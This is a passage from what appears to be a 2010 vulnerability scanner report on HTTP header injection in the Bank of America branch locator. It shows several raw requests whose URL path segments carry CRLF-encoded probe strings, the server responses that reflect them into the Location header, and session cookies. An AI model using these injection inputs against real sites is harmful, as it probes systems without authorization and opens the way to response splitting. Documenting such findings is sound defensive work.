GET /locator/locator/cf97b%0d%0adba134c651a/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:45:01 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=0627E1A738F97EA7E0D2770DFC84185F.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/cf97b dba134c651a/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 464f0%0d%0a27ec7a3a9a4 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/464f0%0d%0a27ec7a3a9a4/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:48:06 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=CAC84E01DC09FA996EAA1CEAC30A1655.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/464f0 27ec7a3a9a4/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload e5360%0d%0ad3e5514522f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/e5360%0d%0ad3e5514522f/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:55:05 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=D850FABA88D55A2DE64423FB6A56D432.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/e5360 d3e5514522f/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 3051d%0d%0a4cdc6ecb91 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/3051d%0d%0a4cdc6ecb91/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:55:06 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=A0D2EF629F00DFD69FB4A05CC928EA4A.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/3051d 4cdc6ecb91/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 53a13%0d%0ae9346304e14 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/53a13%0d%0ae9346304e14=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:56:45 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=B3F2E75DE78FFDB1634DDE0C7D4D96B5.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/53a13 e9346304e14=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 15415%0d%0aa27cc23f9ec was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/15415%0d%0aa27cc23f9ec/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:54:44 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=FA287E79370ED588AF4124A2B954ADBC.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/15415 a27cc23f9ec/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 441ab%0d%0a582ca4368c2 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/441ab%0d%0a582ca4368c2/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:54:44 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=470A4BB34F3607235631404880F6A6A4.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/441ab 582ca4368c2/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload b2d6d%0d%0a2d5aa7ad1ab was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/b2d6d%0d%0a2d5aa7ad1ab/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; 